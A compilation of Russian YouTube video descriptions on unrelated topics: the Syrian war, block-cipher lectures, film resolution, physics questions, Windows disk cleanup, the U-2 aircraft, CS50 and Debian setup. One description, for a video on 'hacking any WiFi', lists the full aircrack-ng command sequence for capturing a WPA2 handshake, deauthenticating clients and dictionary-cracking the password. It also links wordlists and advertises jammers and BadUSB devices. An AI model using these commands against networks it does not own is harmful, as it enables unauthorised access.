Что Россия делает в Сирии и что вообще там происходит / Максим Кац


Ровно пять лет назад, 30 сентября 2015 года, Российская армия начала операцию в Сирии. В этом видео попробуем разобраться, что всё-таки происходит в этом регионе Ближнего Востока и какова роль нашей страны.

-= Реклама =-
Скидка 45% на Факультеты IT руководителей в GeekBrains — geekbrains.ru/link/p6YvC2
_________________________
Оформить спонсорство: www.youtube.com/channel/UCUGfDbfRIx51kJGGHIFo8Rw/join

Подкаст: katz.buzzsprout.com (а также на всех популярных платформах)

Подписывайтесь на мои социальные сети:

Твиттер:
twitter.com/max_katz

Телеграм-канал:
teleg.run/maximkatz

Инстаграм:
www.instagram.com/maxim_katz/

Группа в ВК:
vk.com/maximkatz

Фейсбук:
www.facebook.com/katz.max/

По вопросам рекламы пишите на maxkatz@avtormedia.ru

#Сирия #БлижнийВосток #история
0:00 ИНТРО
0:41 ПРЕДЫСТОРИЯ ИГИЛ
3:49 ИГИЛ УСИЛИВАЕТСЯ
7:16 ОСВЕЩЕНИЕ СИРИЙСКОГО КОНФЛИКТА В СМИ
11:03 КАТАР В СИРИЙСКОЙ ВОЙНЕ
15:53 САУДОВСКАЯ АРАВИЯ В СИРИЙСКОЙ ВОЙНЕ
18:14 ТУРЦИЯ В СИРИЙСКОЙ ВОЙНЕ
21:42 ИРАН В СИРИЙСКОЙ ВОЙНЕ
22:49 ИЗРАИЛЬ В СИРИЙСКОЙ ВОЙНЕ
25:03 США И ЕВРОПА В СИРИЙСКОЙ ВОЙНЕ
28:09 РОССИЯ В СИРИЙСКОЙ ВОЙНЕ
33:18 УРОКИ СИРИЙСКОЙ ВОЙНЫ

Защита информации. Блочные шифры


Блочные шифры, стандарты шифрования, режимы сцепления блоков
— Ссылка на курс с о всеми видео и конспектами: lectoriy.mipt.ru/course/ComputerTechnology-InformationSecurity-13L

Преподаватель:
Владимиров Сергей Михайлович, кандидат физико-математических наук, Профессор: lectoriy.mipt.ru/lecturer/VladimirovSM
— 00:00
Вступление
03:10
Первый стандарт шифрования, DES (Data Encryption Standard)
18:54
Историческая справка (отступление)
20:45
Первый стандарт шифрования, DES (продолжение)
27:42
ГОСТ 28147-89
36:46
Другие блочные шифры
41:08
Режимы шифрования
54:55
Вопросы из аудитории
59:59
Режимы шифрования (продолжение)

Почему 1920-е выглядят ЛУЧШЕ, чем 90-е? [ВБНМ#2]


Почему пленка давала такую качественную картинку и куда мы все это растеряли?

Это видео является спонсорской коллаборацией с Яндексом.
Старое кино в хорошем качестве: yandex.ru/blog/company/oldfilms
Про DeepHP: yandex.ru/promo/deephd
Как работает DeepHD: yandex.ru/company/technologies/deephd/
О разрешении пленки

Меня зовут Артур Шарифов! Я делаю познавательные видео на разные темы, которые показались мне интересными и зацепили меня. Читаю книги, смотрю фильмы, играю в видеоигры, узнаю что-то новое и хочу поделиться этим.
На нашем канале вы можете найти видео о математике, физике, философии, истории, биологии, космосе и многом другом!

Источники и дополнительные материалы:
en.wikipedia.org/wiki/Optical_resolution#/media/File:EIA_Resolution_Chart_1956.svg
www.luxgenix.com/tool/USAF1951cropped.jpg
Eastman Kodak о разрешении
en.wikipedia.org/wiki/Image_resolution#Resolution_in_various_media
Чуть больше про аналоговые (теле-) камеры
www.youtube.com/watch?v=eaB2IHzfy8U хвосты комет
youtu.be/uGvO29NQ8xs?t=106
youtu.be/yIW-EIq4qqo?t=139 заглянем-ка внутрь… это же РЕЙЛГАН
youtu.be/oIwBZAtuPEc?t=54
www.youtube.com/watch?v=f1cT8Z6Nfq0
www.reddit.com/r/AbruptChaos/comments/c13gio/the_bottle/
Первые цифровые камеры
graphics.stanford.edu/~lucasp/Mavica/
imgur.com/a/I99i7 Хотя вот, это фотки с практически одной из первых Mavica с дискетами.
Видео про них: www.youtube.com/watch?v=3Nu6C-Ci7_Q
www.youtube.com/watch?v=4J0Aw2Z-8-k
О разрешении человеческого глаза
www.dslib.net/fiziologia/issledovanie-razlichenija-razmerov-prostyh-izobrazhenij.html
Глаз человека способен разрешить пространственное изменение почти на порядок меньше, чем диаметр самой маленькой колбочки в фовеа* (30 угл.секунд): сдвиг короткой линии или полоски на 8-10 угл. секунд [Westhelmer. 1979], изменение расстояния между двумя линиями на 6 угл. секунд [Westhelmer, 1979], смещение линии или точки (верньерная острота) на 2-4 угл. секунды [Baker and Brian,1912; Berry, 1948; Westhelmer and McKee, 1977b].

Мой инстаграм: www.instagram.com/cardinalartur/
Я ВК: vk.com/artsharif
Телеграм-канал: t-do.ru/ArturSharifov
Группа ВК: vk.com/artmath

Почему Земля - это термос? // Вопросы по физике #1


Задавайте свои вопросы на Яндекс.Кью: clck.ru/R6GEE

В какую сторону самолеты летают быстрее? Спасет ли атомная бомба от астероида? Как звучит музыка в комнате с гелием? Живем ли мы в симуляции? Ответы на эти и другие вопросы — в выпуске!

Таймкоды:
0:00 Миллион подписчиков
0:32 Введение
1:31 Почему лететь на запад дольше, чем на восток?
4:59 Что, если заполнить комнату гелием и включить музыку?
8:28 Что, если оказаться рядом с Солнцем?
11:25 Откуда берется тепло в недрах Земли?
12:40 Что, если взорвать все атомные бомбы?
15:53 Больцмановский мозг
19:34 Заключение

Полезные ссылки:
Погода и ветер на разных высотах: earth.nullschool.net/
Последствия ядерного взрыва: nuclearsecrecy.com/nukemap/classic/#
Миссия DART: meduza.io/news/2020/09/15/evropeyskoe-kosmicheskoe-agentstvo-vpervye-pouchastvuet-v-zaschite-zemli-ot-asteroidov
В процессе дополнения…

МАКСИМАЛЬНАЯ ОЧИСТКА диска С от ХЛАМА, удаляем лишние 20-700 гиг


В этом видео я покажу как максимально очистить диск Ц от хлама в ручную. Также покажу что можно удалить с диска Ц безопасно и что можно перенести на другие диски. Очистить можно от 20 до 700 гиг. Да да 700 гиг! Новый рекорд по отзыву в комментарии!

Дешевая лицензия на Windows и Office — vk.com/market-43241369

Статья — spec-komp.com/news/sovety_po_nastrojke_windows/2014-11-22-915

С помощью наших видео вы сможете легко прокачать ваш компьютер. Удалить все вирусы и гадости из Windows. Провести самостоятельную диагностику своего компьютера. В общем все для хорошей работы вашего компа!

Оглавление:
0:00 – Как максимально очистить диск С?
0:19 – Очистка диска: программа очистки диска
2:45 – Как включить отображение скрытого?
3:40 – Очистка диска: папки Temp
6:35 – Очистка диска: файл подкачки
8:45 – Очистка диска: файл гибернации
11:32 – Очистка диска: папки $Windows.~BT и $Windows.~WS
13:18 – Очистка диска: папка System Volume Information
16:30 – Очистка диска: папки Local, LocalLow, Roaming
18:51 – Каковы результаты?
20:17 – Очистка диска: CCleaner
20:48 – Очистка диска: папки Загрузки и Рабочий стол
22:51 – Как выключить отображение скрытого?
23:27 – Заключение

Оптимизируем работу компьютера — www.youtube.com/watch?v=RzM6S-BJ3VA

Lockheed U-2 | Великий папарацци


Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.

Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.

За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.

Приятного просмотра!

Подписывайтесь на канал, комментируйте, ставьте лайк!
Наша группа ВК: vk.com/club123681709
Инстаграм: www.instagram.com/karen_skyships

Вступайте в Air Public — одну из самых активных страниц, посвященных авиации Вконтакте: vk.com/air_public

1. CS50 на русском: Лекция #1 [Гарвард, Основы программирования, осень 2015 год]


Доп. материалы и задачи к лекции — javarush.ru/s/level_0
Весь курс CS50 — javarush.ru/s/course_cs50

Это Хогвартс? Нет, друзья, это Гарвард и первая лекция (Week 0) легендарного курса по основам программирования CS50 с русским переводом.

Даже на этом вводном занятии (хотя мозг отказывается воспринимать это яркое интерактивное действо как «занятие») @David Malan уже успел рассказать и показать много интересного.

Вот о чем:

• родной язык компьютеров — двоичная система счисления
• ASCII — как записываются символы
• как алгоритмизировать задачи — на живых примерах. Очень живых=)
• почему Дэвид разорвал телефонный справочник или что такое двоичный поиск
• сложность алгоритма — что, как и почему
• о том, что такое циклы, расскажет никто иной, как Марк Цукерберг, основатель Facebook
• …а еще вы увидите его же в 2005 году, в качестве приглашенного гостя CS50. Хм… судя по аудитории, интерес к технологиям вырос в десятки раз!

Подписывайтесь на наш канал, чтобы не пропускать лекции: www.youtube.com/channel/UCMcDsSeqS531-HKz6GiJgtA/featured

И не забывайте заниматься на JavaRush: javarush.ru

Перевод осуществлен cтудией VertDider совместно с JavaRush (http://javarush.ru).

Debian.ч6. Автомонтирование разделов. Добавляем строку в Thunar запуск от Root.


Настраиваем автомонтирование разделов и добавляем строку в Thunar запуск от Root.

Автомонтирование разделов и Thunar от Root
Автомонтирование разделов.
Установить пакет
sudo apt-get install ntfs-3g ntfs-config
Необходимы для работы с разделами NTFS
Автомонтирование разделов настроить программой Диски.

Добавляем строку в Thunar запуск от Root
Если не установлена, то установить утилиту gksu — sudo apt install gksu
В Thunar кликаем Правка-Особые действия- (добавить)
1 для запуска самого Thunar от root во вкладке Основное Имя пишем —
Открыть каталог от администратора. Описание тоже — Открыть каталог с правами администратора
Команда gksu thunar %f
Во вкладке Условия появления отмечаем Каталоги
2 для редактирования конфигов во вкладке Основное Имя пишем —
Редактировать от администратора. Описание тоже — Редактировать от администратора.
Команда gksu gedit %f
Или вместо gedit (его нужно до установить) вписать любой другой текстовой редактор, по умолчанию в Дебиане это Mousepad.
Команда gksu mousepad %f
Во вкладке Условия появления отмечаем Текстовые файлы и Другие файлы.

Теперь через правую клавишу мыши можно открыть конфиг для правки с правами администратора.

Посильная помощь каналу.
Яндекс деньги — money.yandex.ru/to/410019152018457
Карта Сбербанка — На странице сайта prostolinux.my1.ru/index/o_sajte/0-8

{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind


✓ Наш канал в Телеграме: durov.cc/under_public

ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута

● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.

● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i

● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

● Набор словарей:
goo.gl/z7mnhf — Даты, использовать первым
goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
goo.gl/bVsfo2 — Элитный словарь от InsidePRO
goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов

— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk

— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats

— ● Лучшие товары для xaЦkера:

✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7

✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf

✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62

✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm

✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp

✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT

✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP

✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3

✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt

✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5

✓ USB to Ethernet адаптер: ali.pub/4hhxux

✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW

✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ

✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q

✓ Недорогие, но очень мощные рации: goo.gl/dKibg5

✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga

✓ Микро камера: ali.pub/4hhy49

✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav

✓ Коврик для мыши с подсветкой: ali.pub/4hhycm

— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.

● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…

● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind

Ситуационные центры: фокус кросс-отраслевых интересов. Андрей Масалович, Консорциум Инфорус


Модернизация ситуационного центра для обеспечения стабильности в регионе.

Масалович Андрей Игоревич, президент Консорциума Инфорус.